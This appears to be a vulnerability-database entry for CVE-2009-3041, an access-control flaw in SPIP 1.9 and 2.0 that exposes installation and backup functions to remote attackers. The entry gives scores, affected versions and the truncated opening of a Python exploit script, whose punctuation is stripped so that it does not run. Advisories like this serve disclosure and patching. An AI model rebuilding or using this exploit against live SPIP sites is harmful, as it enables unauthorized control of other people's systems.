7.5
CVSSv2

CVE-2009-3041

Published: 01/09/2009 Updated: 17/08/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SPIP 1.9 prior to 1.9.2i and 2.0.x up to and including 2.0.8 does not use proper access control for (1) ecrire/exec/install.php and (2) ecrire/index.php, which allows remote malicious users to conduct unauthorized activities related to installation and backups, as exploited in the wild in August 2009.

Vulnerable Product Search on Vulmon Subscribe to Product

spip spip 2.0.7

spip spip 2.0.2

spip spip 2.0.8

spip spip 1.9.1

spip spip 1.9

spip spip 2.0

spip spip 2.0.6

spip spip 2.0.5

spip spip 1.9.2g

spip spip 1.9.2d

spip spip 2.0.0

spip spip 1.9.2c

spip spip 1.9.alpha1

spip spip 1.9.2h

spip spip 2.0.4

spip spip 2.0.3

spip spip 2.0.1

Exploits

#!/usr/bin/env python # SPIP - Content Management System < 209 exploit # wwwsecurityfocuscom/bid/36008 # Author : Kernel_Panik # import urllib, urllib2 import cookielib import sys def send_request(urlOpener, url, post_data=None): request = urllib2Request(url) url = urlOpeneropen(request, post_data) return urlread() def ...